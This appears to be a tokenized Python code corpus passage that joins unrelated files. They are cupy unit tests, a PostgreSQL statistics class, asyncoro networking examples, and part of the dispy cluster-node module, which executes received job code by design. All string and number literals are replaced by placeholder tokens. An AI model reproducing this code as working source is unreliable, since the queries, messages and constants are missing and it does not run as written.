unit_test . success_case_counter , <NUM_LIT:10> ) <EOL> def test_probabilistic_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . probabilistic_case , <NUM_LIT:10> ) <EOL> _should_pass ( self , f ) <EOL> self . assertLessEqual ( <EOL> self . unit_test . probabilistic_case_counter , <NUM_LIT:10> ) <EOL> self . assertGreater ( <EOL> self . unit_test . probabilistic_case_success_counter , <NUM_LIT:0> ) <EOL> self . assertLess ( self . unit_test . probabilistic_case_failure_counter , <NUM_LIT:10> ) <EOL> testing . run_module ( __name__ , __file__ ) </s>
<s> import unittest <EOL> import numpy <EOL> import cupy <EOL> from cupy . cuda import curand <EOL> class TestGenerateNormal ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . generator = curand . createGenerator ( <EOL> curand . CURAND_RNG_PSEUDO_DEFAULT ) <EOL> def test_invalid_argument_normal_float ( self ) : <EOL> out = cupy . empty ( ( <NUM_LIT:1> , ) , dtype = numpy . float32 ) <EOL> with self . assertRaises ( ValueError ) : <EOL> curand . generateNormal ( <EOL> self . generator , out . data . ptr , <NUM_LIT:1> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) <EOL> def test_invalid_argument_normal_double ( self ) : <EOL> out = cupy . empty ( ( <NUM_LIT:1> , ) , dtype = numpy . float64 ) <EOL> with self . assertRaises ( ValueError ) : <EOL> curand . generateNormalDouble ( <EOL> self . generator , out . data . ptr , <NUM_LIT:1> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) <EOL> def test_invalid_argument_log_normal_float ( self ) : <EOL> out = cupy . empty ( ( <NUM_LIT:1> , ) , dtype = numpy . float32 ) <EOL> with self . assertRaises ( ValueError ) : <EOL> curand . generateLogNormal ( <EOL> self . generator , out . data . ptr , <NUM_LIT:1> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) <EOL> def test_invalid_argument_log_normal_double ( self ) : <EOL> out = cupy . empty ( ( <NUM_LIT:1> , ) , dtype = numpy . float64 ) <EOL> with self . assertRaises ( ValueError ) : <EOL> curand . generateLogNormalDouble ( <EOL> self . generator , out . data . ptr , <NUM_LIT:1> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) </s>
<s> import unittest <EOL> import cupy <EOL> from cupy import testing <EOL> @ testing . gpu <EOL> class TestTranspose ( unittest . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_rollaxis ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return xp . rollaxis ( a , <NUM_LIT:2> ) <EOL> def test_rollaxis_failure ( self ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> with self . assertRaises ( ValueError ) : <EOL> cupy . rollaxis ( a , <NUM_LIT:3> ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_swapaxes ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return xp . swapaxes ( a , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> def test_swapaxes_failure ( self ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> with self . assertRaises ( ValueError ) : <EOL> cupy . swapaxes ( a , <NUM_LIT:3> , <NUM_LIT:0> ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_transpose ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return a . transpose ( - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_transpose_empty ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return a . transpose ( ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_transpose_none ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return a . transpose ( None ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_external_transpose ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return xp . transpose ( a , ( - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_external_transpose_all ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return xp . transpose ( a ) </s>
<s> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> class PostgresInformation ( ) : <EOL> def __init__ ( self , db ) : <EOL> self . db = db <EOL> def relations ( self , with_views ) : <EOL> query = """<STR_LIT>""" % ( "<STR_LIT>" if with_views else "<STR_LIT>" ) <EOL> result = self . db . run_query ( query ) <EOL> return result <EOL> def columns ( self , with_views ) : <EOL> query = """<STR_LIT>""" % ( "<STR_LIT>" if with_views else "<STR_LIT>" ) <EOL> result = self . db . run_query ( query ) <EOL> return result <EOL> def indexes ( self , with_views ) : <EOL> query = """<STR_LIT>""" % ( "<STR_LIT>" if with_views else "<STR_LIT>" ) <EOL> result = self . db . run_query ( query ) <EOL> for row in result : <EOL> row [ '<STR_LIT>' ] = map ( int , str ( row [ '<STR_LIT>' ] ) . split ( ) ) <EOL> return result <EOL> def constraints ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def view_definitions ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def triggers ( self ) : <EOL> query = """<STR_LIT>""" <EOL> def version ( self ) : <EOL> return self . db . run_query ( "<STR_LIT>" ) [ <NUM_LIT:0> ] [ '<STR_LIT:version>' ] <EOL> def table_bloat ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def index_bloat ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def bgwriter_stats ( self ) : <EOL> query = "<STR_LIT>" <EOL> return self . db . run_query ( query ) <EOL> def db_stats ( self ) : <EOL> query = "<STR_LIT>" <EOL> return self . db . run_query ( query ) <EOL> def server_stats ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def settings ( self ) : <EOL> query = "<STR_LIT>" <EOL> result = self . db . run_query ( query ) <EOL> for row in result : <EOL> row [ '<STR_LIT>' ] = row . pop ( '<STR_LIT>' ) <EOL> row [ '<STR_LIT>' ] = row . pop ( '<STR_LIT>' ) <EOL> row [ '<STR_LIT>' ] = row . pop ( '<STR_LIT>' ) <EOL> return result <EOL> def have_stat_activity_helper ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) == [ { "<STR_LIT>" : <NUM_LIT:1> } ] <EOL> def backends ( self ) : <EOL> query = """<STR_LIT>""" <EOL> if self . have_stat_activity_helper ( ) : <EOL> query += "<STR_LIT>" <EOL> else : <EOL> query += "<STR_LIT>" <EOL> query += "<STR_LIT>" <EOL> return self . db . run_query ( query ) <EOL> def replication ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def replication_conflicts ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def locks ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def functions ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) </s>
<s> import asyncoro . disasyncoro as asyncoro <EOL> from asyncoro . discoro import * <EOL> from asyncoro . discoro_schedulers import RemoteCoroScheduler <EOL> def rcoro_avg_proc ( threshold , trend_coro , window_size , coro = None ) : <EOL> import numpy as np <EOL> data = np . empty ( window_size , dtype = float ) <EOL> data . fill ( <NUM_LIT:0.0> ) <EOL> cumsum = <NUM_LIT:0.0> <EOL> while True : <EOL> i , n = yield coro . receive ( ) <EOL> if n is None : <EOL> break <EOL> cumsum += ( n - data [ <NUM_LIT:0> ] ) <EOL> avg = cumsum / window_size <EOL> if avg > threshold : <EOL> trend_coro . send ( ( i , '<STR_LIT>' , float ( avg ) ) ) <EOL> elif avg < - threshold : <EOL> trend_coro . send ( ( i , '<STR_LIT>' , float ( avg ) ) ) <EOL> data = np . roll ( data , - <NUM_LIT:1> ) <EOL> data [ - <NUM_LIT:1> ] = n <EOL> raise StopIteration ( <NUM_LIT:0> ) <EOL> def rcoro_save_proc ( coro = None ) : <EOL> import os <EOL> import tempfile <EOL> with open ( os . path . join ( os . sep , tempfile . gettempdir ( ) , '<STR_LIT>' ) , '<STR_LIT:w>' ) as fd : <EOL> while True : <EOL> i , n = yield coro . receive ( ) <EOL> if n is None : <EOL> break <EOL> fd . write ( '<STR_LIT>' % ( i , n ) ) <EOL> raise StopIteration ( <NUM_LIT:0> ) <EOL> def trend_proc ( coro = None ) : <EOL> coro . set_daemon ( ) <EOL> while True : <EOL> trend = yield coro . receive ( ) <EOL> print ( '<STR_LIT>' % ( trend [ <NUM_LIT:0> ] , trend [ <NUM_LIT:1> ] , trend [ <NUM_LIT:2> ] ) ) <EOL> def client_proc ( computation , coro = None ) : <EOL> if ( yield computation . schedule ( ) ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> trend_coro = asyncoro . Coro ( trend_proc ) <EOL> rcoro_avg = yield rcoro_scheduler . schedule ( rcoro_avg_proc , <NUM_LIT> , trend_coro , <NUM_LIT:10> ) <EOL> assert isinstance ( rcoro_avg , asyncoro . Coro ) <EOL> rcoro_save = yield rcoro_scheduler . schedule ( rcoro_save_proc ) <EOL> assert isinstance ( rcoro_save , asyncoro . Coro ) <EOL> yield asyncoro . AsynCoro . instance ( ) . peer ( rcoro_avg . location , stream_send = True ) <EOL> yield asyncoro . AsynCoro . instance ( ) . peer ( rcoro_save . location , stream_send = True ) <EOL> for i in range ( <NUM_LIT:1000> ) : <EOL> n = random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> item = ( i , n ) <EOL> rcoro_avg . send ( item ) <EOL> rcoro_save . send ( item ) <EOL> yield coro . sleep ( <NUM_LIT> ) <EOL> item = ( i , None ) <EOL> rcoro_avg . send ( item ) <EOL> rcoro_save . send ( item ) <EOL> yield rcoro_scheduler . finish ( close = True ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import logging , random <EOL> asyncoro . logger . setLevel ( logging . DEBUG ) <EOL> Scheduler ( ) <EOL> computation = Computation ( [ ] ) <EOL> rcoro_scheduler = RemoteCoroScheduler ( computation ) <EOL> asyncoro . Coro ( client_proc , computation ) </s>
<s> import sys , socket <EOL> import asyncoro <EOL> def server_proc ( n , sock , coro = None ) : <EOL> for i in range ( n ) : <EOL> msg , addr = yield sock . recvfrom ( <NUM_LIT> ) <EOL> print ( '<STR_LIT>' % ( msg , addr [ <NUM_LIT:0> ] , addr [ <NUM_LIT:1> ] ) ) <EOL> sock . close ( ) <EOL> def client_proc ( host , port , coro = None ) : <EOL> sock = asyncoro . AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> msg = '<STR_LIT>' % ( sock . fileno ( ) ) <EOL> if sys . version_info . major >= <NUM_LIT:3> : <EOL> msg = bytes ( msg , '<STR_LIT:ascii>' ) <EOL> yield sock . sendto ( msg , ( host , port ) ) <EOL> sock . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sock = asyncoro . AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> sock . bind ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> host , port = sock . getsockname ( ) <EOL> n = <NUM_LIT:50> <EOL> server_coro = asyncoro . Coro ( server_proc , n , sock ) <EOL> for i in range ( n ) : <EOL> asyncoro . Coro ( client_proc , host , port ) <EOL> server_coro . value ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __copyright__ = "<STR_LIT>" <EOL> __contributors__ = [ ] <EOL> __maintainer__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __url__ = "<STR_LIT>" <EOL> __status__ = "<STR_LIT>" <EOL> import os <EOL> import sys <EOL> import time <EOL> import stat <EOL> import socket <EOL> import multiprocessing <EOL> import threading <EOL> import subprocess <EOL> import traceback <EOL> import logging <EOL> import marshal <EOL> import tempfile <EOL> import shutil <EOL> import glob <EOL> import functools <EOL> import inspect <EOL> import pickle <EOL> import io <EOL> try : <EOL> import psutil <EOL> except ImportError : <EOL> psutil = None <EOL> from dispy import _JobReply , DispyJob , DispyNodeAvailInfo , _Function , _Compute , _XferFile , _node_ipaddr , _dispy_version , auth_code , num_min , _same_file , MsgTimeout <EOL> import asyncoro <EOL> from asyncoro import Coro , AsynCoro , AsyncSocket , serialize , unserialize <EOL> __version__ = _dispy_version <EOL> __all__ = [ ] <EOL> MaxFileSize = <NUM_LIT:0> <EOL> def dispy_provisional_result ( result , timeout = MsgTimeout ) : <EOL> """<STR_LIT>""" <EOL> dispy_job_reply = __dispy_job_info . job_reply <EOL> dispy_job_reply . status = DispyJob . ProvisionalResult <EOL> dispy_job_reply . result = result <EOL> dispy_job_reply . end_time = time . time ( ) <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> sock = AsyncSocket ( sock , blocking = True , keyfile = __dispy_job_keyfile , <EOL> certfile = __dispy_job_certfile ) <EOL> sock . settimeout ( timeout ) <EOL> try : <EOL> sock . connect ( __dispy_job_info . reply_addr ) <EOL> sock . send_msg ( b'<STR_LIT>' + serialize ( dispy_job_reply ) ) <EOL> ack = sock . recv_msg ( ) <EOL> assert ack == b'<STR_LIT>' <EOL> except : <EOL> print ( "<STR_LIT>" % ( str ( result ) , traceback . format_exc ( ) ) ) <EOL> return - <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> finally : <EOL> sock . close ( ) <EOL> def dispy_send_file ( path , timeout = MsgTimeout ) : <EOL> """<STR_LIT>""" <EOL> path = os . path . expanduser ( path ) <EOL> xf = _XferFile ( path , os . stat ( path ) ) <EOL> if MaxFileSize and xf . stat_buf . st_size > MaxFileSize : <EOL> return - <NUM_LIT:1> <EOL> xf . name = os . path . splitdrive ( path ) [ <NUM_LIT:1> ] <EOL> if xf . name . startswith ( os . sep ) : <EOL> xf . name = xf . name [ len ( os . sep ) : ] <EOL> dispy_job_reply = __dispy_job_info . job_reply <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> sock = AsyncSocket ( sock , blocking = True , <EOL> keyfile = __dispy_job_keyfile , certfile = __dispy_job_certfile ) <EOL> sock . settimeout ( timeout ) <EOL> try : <EOL> sock . connect ( __dispy_job_info . reply_addr ) <EOL> sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( xf ) ) <EOL> sock . send_msg ( serialize ( dispy_job_reply ) ) <EOL> recvd = sock . recv_msg ( ) <EOL> recvd = unserialize ( recvd ) <EOL> fd = open ( path , '<STR_LIT:rb>' ) <EOL> sent = <NUM_LIT:0> <EOL> while sent == recvd : <EOL> data = fd . read ( <NUM_LIT> ) <EOL> if not data : <EOL> break <EOL> sock . sendall ( data ) <EOL> sent += len ( data ) <EOL> recvd = sock . recv_msg ( ) <EOL> recvd = unserialize ( recvd ) <EOL> fd . close ( ) <EOL> assert recvd == xf . stat_buf . st_size <EOL> except : <EOL> print ( '<STR_LIT>' % ( path , traceback . format_exc ( ) ) ) <EOL> return - <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> finally : <EOL> sock . close ( ) <EOL> class _DispyJobInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , job_reply , reply_addr , compute , xfer_files ) : <EOL> self . job_reply = job_reply <EOL> self . reply_addr = reply_addr <EOL> self . compute_id = compute . id <EOL> self . compute_dest_path = compute . dest_path <EOL> self . xfer_files = xfer_files <EOL> self . compute_auth = compute . auth <EOL> self . proc = None <EOL> def _dispy_job_func ( __dispy_job_info , __dispy_job_certfile , __dispy_job_keyfile , <EOL> __dispy_job_name , __dispy_job_args , __dispy_job_kwargs , <EOL> __dispy_job_code , __dispy_job_globals , __dispy_path , __dispy_reply_Q ) : <EOL> """<STR_LIT>""" <EOL> os . chdir ( __dispy_path ) <EOL> sys . stdout = io . StringIO ( ) <EOL> sys . stderr = io . StringIO ( ) <EOL> __dispy_job_reply = __dispy_job_info . job_reply <EOL> globals ( ) . update ( __dispy_job_globals ) <EOL> try : <EOL> exec ( marshal . loads ( __dispy_job_code [ <NUM_LIT:0> ] ) , globals ( ) ) <EOL> if __dispy_job_code [ <NUM_LIT:1> ] : <EOL> exec ( __dispy_job_code [ <NUM_LIT:1> ] , globals ( ) ) <EOL> if __name__ == '<STR_LIT>' : <EOL> sys . modules [ '<STR_LIT>' ] . __dict__ . update ( globals ( ) ) <EOL> __dispy_job_args = unserialize ( __dispy_job_args ) <EOL> __dispy_job_kwargs = unserialize ( __dispy_job_kwargs ) <EOL> globals ( ) . update ( locals ( ) ) <EOL> exec ( '<STR_LIT>' % <EOL> __dispy_job_name , globals ( ) ) <EOL> __dispy_job_reply . status = DispyJob . Finished <EOL> except : <EOL> __dispy_job_reply . exception = traceback . format_exc ( ) <EOL> __dispy_job_reply . status = DispyJob . Terminated <EOL> __dispy_job_reply . stdout = sys . stdout . getvalue ( ) <EOL> __dispy_job_reply . stderr = sys . stderr . getvalue ( ) <EOL> __dispy_job_reply . end_time = time . time ( ) <EOL> __dispy_job_info . proc = None <EOL> __dispy_reply_Q . put ( __dispy_job_reply ) <EOL> class _DispyNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , cpus , ip_addr = None , ext_ip_addr = None , node_port = None , <EOL> name = '<STR_LIT>' , scheduler_node = None , scheduler_port = None , <EOL> dest_path_prefix = '<STR_LIT>' , clean = False , secret = '<STR_LIT>' , keyfile = None , certfile = None , <EOL> zombie_interval = <NUM_LIT> , service_start = None , service_stop = None , service_end = None , <EOL> serve = - <NUM_LIT:1> , daemon = False ) : <EOL> assert <NUM_LIT:0> < cpus <= multiprocessing . cpu_count ( ) <EOL> self . num_cpus = cpus <EOL> if name : <EOL> self . name = name <EOL> else : <EOL> self . name = socket . gethostname ( ) <EOL> if ip_addr : <EOL> ip_addr = _node_ipaddr ( ip_addr ) <EOL> if not ip_addr : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> else : <EOL> ip_addr = socket . gethostbyname ( socket . gethostname ( ) ) <EOL> if ip_addr . startswith ( '<STR_LIT>' ) : <EOL> _dispy_logger . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , ip_addr ) <EOL> if ext_ip_addr : <EOL> ext_ip_addr = _node_ipaddr ( ext_ip_addr ) <EOL> if not ext_ip_addr : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> else : <EOL> ext_ip_addr = ip_addr <EOL> if not self . name : <EOL> try : <EOL> self . name = socket . gethostbyaddr ( ext_ip_addr ) [ <NUM_LIT:0> ] <EOL> except : <EOL> self . name = '<STR_LIT>' <EOL> if node_port is None : <EOL> node_port = <NUM_LIT> <EOL> self . ext_ip_addr = ext_ip_addr <EOL> self . pulse_interval = None <EOL> self . keyfile = keyfile <EOL> self . certfile = certfile <EOL> if self . keyfile : <EOL> self . keyfile = os . path . abspath ( self . keyfile ) <EOL> if self . certfile : <EOL> self . certfile = os . path . abspath ( self . certfile ) <EOL> self . asyncoro = AsynCoro ( ) <EOL> self . tcp_sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = keyfile , certfile = certfile ) <EOL> self . tcp_sock . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , <NUM_LIT:1> ) <EOL> self . tcp_sock . bind ( ( ip_addr , node_port ) ) <EOL> self . address = self . tcp_sock . getsockname ( ) <EOL> self . port = self . address [ <NUM_LIT:1> ] <EOL> self . tcp_sock . listen ( <NUM_LIT:30> ) <EOL> if not dest_path_prefix : <EOL> dest_path_prefix = os . path . join ( tempfile . gettempdir ( ) , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . dest_path_prefix = os . path . abspath ( dest_path_prefix . strip ( ) ) . rstrip ( os . sep ) <EOL> if clean : <EOL> shutil . rmtree ( self . dest_path_prefix , ignore_errors = True ) <EOL> if not os . path . isdir ( self . dest_path_prefix ) : <EOL> os . makedirs ( self . dest_path_prefix ) <EOL> os . chmod ( self . dest_path_prefix , stat . S_IRUSR | stat . S_IWUSR | stat . S_IXUSR ) <EOL> self . avail_cpus = self . num_cpus <EOL> self . computations = { } <EOL> self . job_infos = { } <EOL> self . terminate = False <EOL> self . sign = '<STR_LIT>' . join ( hex ( x ) [ <NUM_LIT:2> : ] for x in os . urandom ( <NUM_LIT:10> ) ) <EOL> self . secret = secret <EOL> self . auth = auth_code ( self . secret , self . sign ) <EOL> self . zombie_interval = <NUM_LIT> * zombie_interval <EOL> if not scheduler_port : <EOL> scheduler_port = <NUM_LIT> <EOL> self . scheduler = { '<STR_LIT>' : None , '<STR_LIT:port>' : scheduler_port , '<STR_LIT>' : set ( ) } <EOL> self . cpu_time = <NUM_LIT:0> <EOL> self . num_jobs = <NUM_LIT:0> <EOL> self . num_computations = <NUM_LIT:0> <EOL> fd = open ( os . path . join ( self . dest_path_prefix , '<STR_LIT>' ) , '<STR_LIT:wb>' ) <EOL> config = { <EOL> '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . avail_cpus , <EOL> '<STR_LIT>' : self . sign , '<STR_LIT>' : self . secret , '<STR_LIT>' : self . auth <EOL> } <EOL> pickle . dump ( config , fd ) <EOL> fd . close ( ) <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT:.>' ) <EOL> proc = multiprocessing . Process ( target = functools . partial ( int ) , args = ( <NUM_LIT> , ) ) <EOL> proc . start ( ) <EOL> proc . join ( ) <EOL> self . thread_lock = threading . Lock ( ) <EOL> self . udp_sock = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) <EOL> self . udp_sock . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , <NUM_LIT:1> ) <EOL> self . udp_sock . bind ( ( '<STR_LIT>' , self . port ) ) <EOL> _dispy_logger . info ( '<STR_LIT>' , <EOL> self . num_cpus , self . ext_ip_addr , self . port ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , self . address [ <NUM_LIT:0> ] , self . address [ <NUM_LIT:1> ] ) <EOL> self . udp_sock = AsyncSocket ( self . udp_sock ) <EOL> self . reply_Q = multiprocessing . Queue ( ) <EOL> self . reply_Q_thread = threading . Thread ( target = self . __reply_Q ) <EOL> self . reply_Q_thread . start ( ) <EOL> self . serve = serve <EOL> self . timer_coro = Coro ( self . timer_task ) <EOL> self . service_start = self . service_stop = self . service_end = None <EOL> if isinstance ( service_start , time . struct_time ) and ( isinstance ( service_stop , time . struct_time ) or <EOL> isinstance ( service_end , time . struct_time ) ) : <EOL> self . service_start = ( service_start . tm_hour , service_start . tm_min ) <EOL> if isinstance ( service_stop , time . struct_time ) : <EOL> self . service_stop = ( service_stop . tm_hour , service_stop . tm_min ) <EOL> if isinstance ( service_end , time . struct_time ) : <EOL> self . service_end = ( service_end . tm_hour , service_end . tm_min ) <EOL> Coro ( self . service_schedule ) <EOL> self . __init_code = '<STR_LIT>' . join ( inspect . getsource ( dispy_provisional_result ) ) <EOL> self . __init_code += '<STR_LIT>' . join ( inspect . getsource ( dispy_send_file ) ) <EOL> self . __init_modules = dict ( sys . modules ) <EOL> if os . name == '<STR_LIT>' : <EOL> self . __init_globals = dict ( globals ( ) ) <EOL> self . tcp_coro = Coro ( self . tcp_server ) <EOL> self . udp_coro = Coro ( self . udp_server , _node_ipaddr ( scheduler_node ) , scheduler_port ) <EOL> if not daemon : <EOL> Coro ( self . read_stdin ) <EOL> def broadcast_ping_msg ( self , coro = None ) : <EOL> if ( self . scheduler [ '<STR_LIT>' ] or self . job_infos or not self . avail_cpus or <EOL> not self . service_available ( ) ) : <EOL> raise StopIteration <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) <EOL> sock . setsockopt ( socket . SOL_SOCKET , socket . SO_BROADCAST , <NUM_LIT:1> ) <EOL> sock = AsyncSocket ( sock ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> ping_msg = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign , <EOL> '<STR_LIT:version>' : _dispy_version , '<STR_LIT>' : None } <EOL> try : <EOL> yield sock . sendto ( '<STR_LIT>' . encode ( ) + serialize ( ping_msg ) , <EOL> ( '<STR_LIT>' , self . scheduler [ '<STR_LIT:port>' ] ) ) <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> pass <EOL> sock . close ( ) <EOL> def send_pong_msg ( self , info , addr , coro = None ) : <EOL> if ( self . scheduler [ '<STR_LIT>' ] or self . job_infos or not self . num_cpus or <EOL> not self . service_available ( ) ) : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> self . avail_cpus , self . num_cpus , addr [ <NUM_LIT:0> ] ) <EOL> raise StopIteration <EOL> try : <EOL> scheduler_ip_addrs = info [ '<STR_LIT>' ] <EOL> if not info . get ( '<STR_LIT>' , None ) : <EOL> scheduler_ip_addrs . append ( addr [ <NUM_LIT:0> ] ) <EOL> scheduler_port = info [ '<STR_LIT:port>' ] <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> raise StopIteration <EOL> if info . get ( '<STR_LIT>' , None ) : <EOL> pong_msg = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign , <EOL> '<STR_LIT:version>' : _dispy_version , '<STR_LIT:name>' : self . name , '<STR_LIT>' : self . avail_cpus , <EOL> '<STR_LIT>' : auth_code ( self . secret , info [ '<STR_LIT>' ] ) } <EOL> if psutil : <EOL> pong_msg [ '<STR_LIT>' ] = DispyNodeAvailInfo ( <EOL> <NUM_LIT> - psutil . cpu_percent ( ) , psutil . virtual_memory ( ) . available , <EOL> psutil . disk_usage ( self . dest_path_prefix ) . free , <EOL> <NUM_LIT> - psutil . swap_memory ( ) . percent ) <EOL> else : <EOL> pong_msg [ '<STR_LIT>' ] = None <EOL> for scheduler_ip_addr in scheduler_ip_addrs : <EOL> addr = ( scheduler_ip_addr , scheduler_port ) <EOL> pong_msg [ '<STR_LIT>' ] = scheduler_ip_addr <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( addr ) <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( pong_msg ) ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] , addr [ <NUM_LIT:1> ] ) <EOL> finally : <EOL> sock . close ( ) <EOL> else : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> ping_msg = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign , <EOL> '<STR_LIT:version>' : _dispy_version } <EOL> for scheduler_ip_addr in scheduler_ip_addrs : <EOL> addr = ( scheduler_ip_addr , scheduler_port ) <EOL> ping_msg [ '<STR_LIT>' ] = scheduler_ip_addr <EOL> try : <EOL> yield sock . sendto ( '<STR_LIT>' . encode ( ) + serialize ( ping_msg ) , addr ) <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> pass <EOL> sock . close ( ) <EOL> def udp_server ( self , scheduler_ip , scheduler_port , coro = None ) : <EOL> coro . set_daemon ( ) <EOL> yield self . broadcast_ping_msg ( coro = coro ) <EOL> ping_msg = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign , <EOL> '<STR_LIT:version>' : _dispy_version } <EOL> def send_ping_msg ( self , info , coro = None ) : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> addr = ( info [ '<STR_LIT>' ] , info [ '<STR_LIT:port>' ] ) <EOL> info . update ( ping_msg ) <EOL> info [ '<STR_LIT>' ] = addr [ <NUM_LIT:0> ] <EOL> try : <EOL> yield sock . sendto ( '<STR_LIT>' . encode ( ) + serialize ( info ) , addr ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( addr ) <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> if scheduler_ip : <EOL> Coro ( send_ping_msg , self , { '<STR_LIT>' : 